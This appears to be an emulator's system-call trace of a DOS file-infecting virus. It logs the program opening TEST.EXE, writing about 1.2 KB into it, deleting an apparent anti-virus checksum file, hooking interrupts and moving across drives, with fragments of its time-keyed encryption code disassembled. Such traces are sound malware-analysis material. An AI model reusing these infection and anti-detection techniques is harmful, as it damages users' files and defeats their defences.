2018-12-17T22:48:46.931041647Z 44 PC: 1523c | Get time 0x1523c: cmp cl, 5
0x1523f: jne 0x15244
0x15241: call 0x1534a
0x15244: cmp cl, 0xd
0x15247: jne 0x1524c
0x15249: call 0x15359
0x1524c: cmp cl, 0x1e
0x1524f: jne 0x15258
0x15251: lea dx, word ptr [bp + 0x290]
0x15255: call 0x15330
0x15258: cmp cl, 0x28
0x1525b: jne 0x15264
0x1525d: lea dx, word ptr [bp + 0x290]
0x15261: call 0x15330
0x15264: cmp cl, 0x32
0x15267: jne 0x15270
0x15269: lea dx, word ptr [bp + 0x2c7]
0x1526d: call 0x15330
0x15270: lea si, word ptr [bp + 0x195]
0x15274: lea di, word ptr [bp + 0x18d]
2018-12-17T22:48:46.945325698Z 53 PC: 14fba | Get interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-17T22:48:46.946247075Z 53 PC: 14fba | Get interrupt vector (Interrupt = '2' AKA 'Character output')
2018-12-17T22:48:46.947319108Z 53 PC: 14fba | Get interrupt vector (Interrupt = '27' AKA 'Get allocation info for default drive')
2018-12-17T22:48:46.948583483Z 53 PC: 14fba | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:48:46.949509332Z 53 PC: 14fba | Get interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-17T22:48:46.951013Z 53 PC: 14fba | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:48:46.952189635Z 53 PC: 14fba | Get interrupt vector (Interrupt = '52' AKA 'Get InDOS flag pointer')
2018-12-17T22:48:46.95322374Z 53 PC: 14fba | Get interrupt vector (Interrupt = '53' AKA 'Get interrupt vector')
2018-12-17T22:48:46.954761261Z 53 PC: 14fba | Get interrupt vector (Interrupt = '54' AKA 'Get free disk space')
2018-12-17T22:48:46.955934586Z 53 PC: 14fba | Get interrupt vector (Interrupt = '55' AKA 'Get or set switch character')
2018-12-17T22:48:46.957088818Z 53 PC: 14fba | Get interrupt vector (Interrupt = '56' AKA 'Get or set country info')
2018-12-17T22:48:46.958803255Z 53 PC: 14fba | Get interrupt vector (Interrupt = '57' AKA 'Create subdirectory')
2018-12-17T22:48:46.960304479Z 53 PC: 14fba | Get interrupt vector (Interrupt = '58' AKA 'Remove subdirectory')
2018-12-17T22:48:46.961441716Z 53 PC: 14fba | Get interrupt vector (Interrupt = '59' AKA 'Change current directory')
2018-12-17T22:48:46.963250434Z 53 PC: 14fba | Get interrupt vector (Interrupt = '60' AKA 'Create or truncate file')
2018-12-17T22:48:46.964811191Z 53 PC: 14fba | Get interrupt vector (Interrupt = '61' AKA 'Open file')
2018-12-17T22:48:46.966326316Z 53 PC: 14fba | Get interrupt vector (Interrupt = '62' AKA 'Close file')
2018-12-17T22:48:46.968696381Z 53 PC: 14fba | Get interrupt vector (Interrupt = '63' AKA 'Read file or device')
2018-12-17T22:48:46.969729348Z 53 PC: 14fba | Get interrupt vector (Interrupt = '117' AKA 'UNKNOWN!')
2018-12-17T22:48:46.970700937Z 37 PC: 14fcf | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-17T22:48:46.973194924Z 37 PC: 14fd7 | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-17T22:48:46.974389188Z 37 PC: 14fdf | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:48:46.975562124Z 37 PC: 14fe7 | Set interrupt vector (Interrupt = '63' AKA 'Read file or device')
2018-12-17T22:48:46.977798291Z 68 PC: 15eab | I/O control for devices (Set for = '� ��O�Э:E�t��ҭ3ɬ� �u��ŝ]_^ZY[�P�/��t�\�ЭXâЭX�SQRWV�������6έ�6̭�6ʭ2ɬ �t:�t��t�����2ɪ���6έ��3����t!�Э �u:E�t��� �u�����}��')
2018-12-17T22:48:47.156716005Z 64 PC: 1563b | Write file or device (Write 0 bytes on handle 1)
2018-12-17T22:48:47.158486561Z 37 PC: 15111 | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-17T22:48:47.160183142Z 37 PC: 15111 | Set interrupt vector (Interrupt = '2' AKA 'Character output')
2018-12-17T22:48:47.161296707Z 37 PC: 15111 | Set interrupt vector (Interrupt = '27' AKA 'Get allocation info for default drive')
2018-12-17T22:48:47.162365342Z 37 PC: 15111 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:48:47.163777092Z 37 PC: 15111 | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-17T22:48:47.164819867Z 37 PC: 15111 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:48:47.166104223Z 37 PC: 15111 | Set interrupt vector (Interrupt = '52' AKA 'Get InDOS flag pointer')
2018-12-17T22:48:47.167605405Z 37 PC: 15111 | Set interrupt vector (Interrupt = '53' AKA 'Get interrupt vector')
2018-12-17T22:48:47.168623988Z 37 PC: 15111 | Set interrupt vector (Interrupt = '54' AKA 'Get free disk space')
2018-12-17T22:48:47.170364397Z 37 PC: 15111 | Set interrupt vector (Interrupt = '55' AKA 'Get or set switch character')
2018-12-17T22:48:47.171368868Z 37 PC: 15111 | Set interrupt vector (Interrupt = '56' AKA 'Get or set country info')
2018-12-17T22:48:47.172302254Z 37 PC: 15111 | Set interrupt vector (Interrupt = '57' AKA 'Create subdirectory')
2018-12-17T22:48:47.173543073Z 37 PC: 15111 | Set interrupt vector (Interrupt = '58' AKA 'Remove subdirectory')
2018-12-17T22:48:47.174574677Z 37 PC: 15111 | Set interrupt vector (Interrupt = '59' AKA 'Change current directory')
2018-12-17T22:48:47.175536053Z 37 PC: 15111 | Set interrupt vector (Interrupt = '60' AKA 'Create or truncate file')
2018-12-17T22:48:47.176980571Z 37 PC: 15111 | Set interrupt vector (Interrupt = '61' AKA 'Open file')
2018-12-17T22:48:47.177940135Z 37 PC: 15111 | Set interrupt vector (Interrupt = '62' AKA 'Close file')
2018-12-17T22:48:47.179240867Z 37 PC: 15111 | Set interrupt vector (Interrupt = '63' AKA 'Read file or device')
2018-12-17T22:48:47.180706422Z 37 PC: 15111 | Set interrupt vector (Interrupt = '117' AKA 'UNKNOWN!')
2018-12-17T22:48:47.18151738Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.182821734Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.1847466Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.186263781Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.187982377Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.19066106Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.19215816Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.193699884Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.195937491Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.197915865Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.199878607Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.202024554Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.203902089Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.205917864Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.207850125Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.209678626Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.211879381Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.21380067Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.215611153Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.217906332Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.219789325Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.221717403Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.224091076Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.226147582Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.228033003Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.2304707Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.232329514Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.234378393Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.236799536Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.239124268Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.242211437Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.245341471Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.247313242Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.250837921Z 76 PC: 15150 | Terminate with return code (Return code = '200')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":9667,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:23:29.403489711Z 25 PC: 15198 | Get default drive
2018-12-25T12:23:29.406303396Z 71 PC: 151a7 | Get current directory
2018-12-25T12:23:29.409789603Z 26 PC: 153fd | Set disk transfer address
2018-12-25T12:23:29.411370865Z 78 PC: 15408 | Find first file
2018-12-25T12:23:29.417987906Z 67 PC: 1542b | Get or set file attributes
2018-12-25T12:23:29.42413948Z 67 PC: 15433 | Get or set file attributes
2018-12-25T12:23:29.439529399Z 61 PC: 15438 | Open file (Filename = 'TEST.EXE')
2018-12-25T12:23:29.451109199Z 87 PC: 1543e | Get or set file date and time
2018-12-25T12:23:29.453056497Z 63 PC: 15455 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:23:29.459587997Z 66 PC: 154a6 | Move file pointer
2018-12-25T12:23:29.461436063Z 44 PC: 1550b | Get time 0x1550b: mov cx, 8
0x1550e: lea di, word ptr [bp + 0x555]
0x15512: inc di
0x15513: shl dx, 1
0x15515: jb 0x1551e
0x15517: mov word ptr [di], 0xf8
0x1551b: jmp 0x15522
0x1551d: nop
0x1551e: mov word ptr [di], 0xfc
0x15522: loop 0x15512
0x15524: mov ah, 0x2c
0x15526: int 0x21
0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
2018-12-25T12:23:29.470981297Z 44 PC: 15528 | Get time 0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
0x1553b: loop 0x1552b
0x1553d: mov ah, 0x2c
0x1553f: int 0x21
0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
2018-12-25T12:23:29.473184093Z 44 PC: 15541 | Get time 0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
0x15555: mov ah, 0x2c
0x15557: int 0x21
0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
2018-12-25T12:23:29.475262208Z 64 PC: 15550 | Write file or device (Write 9 bytes on handle 5)
2018-12-25T12:23:29.482689563Z 44 PC: 15559 | Get time 0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: mov ax, 0x4202
0x15581: xor cx, cx
0x15583: xor dx, dx
0x15585: int 0x21
0x15587: push ax
0x15588: mov cl, 9
2018-12-25T12:23:29.485026121Z 64 PC: 1556c | Write file or device (Write 1207 bytes on handle 5)
2018-12-25T12:23:29.494347167Z 44 PC: 15570 | Get time 0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: mov ax, word ptr [0x5b00]
0x15581: xor ax, dx
0x15583: xor bx, cx
0x15585: iret
0x15586: cmp byte ptr [bp + si - 0x58], dl
0x15589: or cx, dx
0x1558b: ljmp 0x11e0:0xc8ca
0x15590: leave
0x15591: pop dx
0x15592: cdq
0x15593: out 0x18, al
0x15595: cmp al, 0x90
0x15597: xchg ax, sp
0x15598: retf 0x2706
2018-12-25T12:23:29.496859109Z 64 PC: 1557b | Write file or device (Write 25 bytes on handle 5)
2018-12-25T12:23:29.500126984Z 66 PC: 15587 | Move file pointer
2018-12-25T12:23:29.50169507Z 66 PC: 155a8 | Move file pointer
2018-12-25T12:23:29.503454617Z 64 PC: 155b3 | Write file or device (Write 26 bytes on handle 5)
2018-12-25T12:23:29.506516314Z 67 PC: 15345 | Get or set file attributes
2018-12-25T12:23:29.512205437Z 65 PC: 15349 | Delete file (Filename = 'chklist.ms')
2018-12-25T12:23:29.518147398Z 87 PC: 155cc | Get or set file date and time
2018-12-25T12:23:29.520115695Z 62 PC: 155d0 | Close file
2018-12-25T12:23:29.528733587Z 67 PC: 155da | Get or set file attributes
2018-12-25T12:23:29.539032849Z 79 PC: 1541f | Find next file
2018-12-25T12:23:29.541993489Z 59 PC: 152c0 | Change current directory
2018-12-25T12:23:29.545889256Z 14 PC: 151d5 | Set default drive (Drive = 'C')
2018-12-25T12:23:29.547572244Z 26 PC: 153fd | Set disk transfer address (See above)
2018-12-25T12:23:29.548632707Z 78 PC: 15408 | Find first file (See above)
2018-12-25T12:23:29.553821225Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:29.558384031Z 59 PC: 151e0 | Change current directory
2018-12-25T12:23:29.564004768Z 26 PC: 153fd | Set disk transfer address (See above)
2018-12-25T12:23:29.564998086Z 78 PC: 15408 | Find first file (See above)
2018-12-25T12:23:29.573387913Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:29.579864994Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:30.918333783Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:30.926171308Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:30.928004121Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:30.933751098Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:30.93559716Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:30.938894333Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:30.940969429Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:30.943102138Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:30.950132178Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:30.952449262Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:30.974133838Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:30.977501342Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:30.980371036Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:30.981707642Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:30.983841419Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:30.986738729Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:30.995476949Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:31.002443138Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:31.00451888Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:31.066866171Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:31.082433612Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:31.085878671Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:31.091737036Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:31.122011034Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:31.128720965Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:31.130031609Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:31.137826039Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:31.13922553Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:31.141181191Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:31.143677699Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:31.145983824Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:31.151759968Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:31.154471175Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:31.205721026Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:31.207564295Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:31.210421506Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:31.212893051Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:31.214197017Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:31.216845689Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:31.223024377Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:31.228695442Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:31.230518016Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:31.238411998Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:31.247704814Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:31.250894833Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:31.257701312Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:31.267818785Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:31.274530726Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:31.276909487Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:31.282864493Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:31.284572014Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:31.287663895Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:31.290342987Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:31.292656925Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:31.299580713Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:31.302482936Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:31.310860249Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:31.313927216Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:31.317389704Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:31.319049072Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:31.320780715Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:31.324628875Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:31.330556581Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:31.337295139Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:31.339879843Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:31.346610084Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:31.355763017Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:31.359736976Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:31.365675966Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:31.375023327Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:31.382157297Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:31.383811102Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:31.389448552Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:31.39171324Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:31.394053896Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:31.397009928Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:31.400190783Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:31.406435358Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:31.409017703Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:31.716291843Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:31.719449181Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:31.819234342Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:31.822333819Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:31.824067595Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:31.827409181Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:31.83438674Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:31.841136004Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:31.843019122Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:32.046499307Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:32.055969447Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:32.058824182Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:32.063862891Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:32.070996069Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:32.07780993Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:32.080580912Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:32.086532903Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:32.089038531Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:32.091652333Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:32.09492852Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:32.097344966Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:32.103989561Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:32.107697274Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:32.11556949Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:32.117941208Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:32.122003632Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:32.123818887Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:32.125428383Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:32.129366213Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.135185352Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.1412103Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:32.143742082Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:32.15028869Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:32.160326113Z 14 PC: 151e9 | Set default drive (Drive = 'D')
2018-12-25T12:23:32.162597922Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:32.166957162Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:32.170758847Z 14 PC: 151f2 | Set default drive (Drive = 'E')
2018-12-25T12:23:32.172888404Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:32.176773834Z 14 PC: 15218 | Set default drive (Drive = 'A')
2018-12-25T12:23:32.178082346Z 59 PC: 15220 | Change current directory
2018-12-25T12:23:32.182866395Z 44 PC: 1523c | Get time 0x1523c: cmp cl, 5
0x1523f: jne 0x15244
0x15241: call 0x1534a
0x15244: cmp cl, 0xd
0x15247: jne 0x1524c
0x15249: call 0x15359
0x1524c: cmp cl, 0x1e
0x1524f: jne 0x15258
0x15251: lea dx, word ptr [bp + 0x290]
0x15255: call 0x15330
0x15258: cmp cl, 0x28
0x1525b: jne 0x15264
0x1525d: lea dx, word ptr [bp + 0x290]
0x15261: call 0x15330
0x15264: cmp cl, 0x32
0x15267: jne 0x15270
0x15269: lea dx, word ptr [bp + 0x2c7]
0x1526d: call 0x15330
0x15270: lea si, word ptr [bp + 0x195]
0x15274: lea di, word ptr [bp + 0x18d]
2018-12-25T12:23:32.207585088Z 53 PC: 14fba | Get interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:32.20856221Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.209625151Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.210939373Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.211855326Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.212921131Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.214185185Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.215110395Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.216340931Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.217461411Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.218346763Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.219960416Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.220866173Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.221723403Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.223360404Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.22421173Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.225094139Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.22647897Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.227291188Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.228087369Z 37 PC: 14fcf | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:32.22990092Z 37 PC: 14fd7 | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:23:32.230977655Z 37 PC: 14fdf | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:23:32.232024412Z 37 PC: 14fe7 | Set interrupt vector (Interrupt = '63' AKA 'Read file or device')
2018-12-25T12:23:32.233829367Z 68 PC: 15eab | I/O control for devices (Set for = '� ��O�Э:E�t��ҭ3ɬ� �u��ŝ]_^ZY[�P�/��t�\�ЭXâЭX�SQRWV�������6έ�6̭�6ʭ2ɬ �t:�t��t�����2ɪ���6έ��3����t!�Э �u:E�t��� �u�����}��')
2018-12-25T12:23:32.397774444Z 64 PC: 1563b | Write file or device (Write 0 bytes on handle 1)
2018-12-25T12:23:32.399364258Z 37 PC: 15111 | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:32.401123416Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.402160721Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.403122237Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.405440497Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.406474161Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.407479346Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.408988572Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.410013837Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.411019173Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.412401495Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.413365458Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.414314947Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.416364815Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.41741003Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.418456785Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.419921055Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.421123393Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.42218134Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.423913279Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.425826499Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.427756165Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.42991225Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.431823775Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.433944048Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.436223987Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.438075578Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.440135648Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.442431315Z 6 PC: 15198 | Direct console I/O (See above)
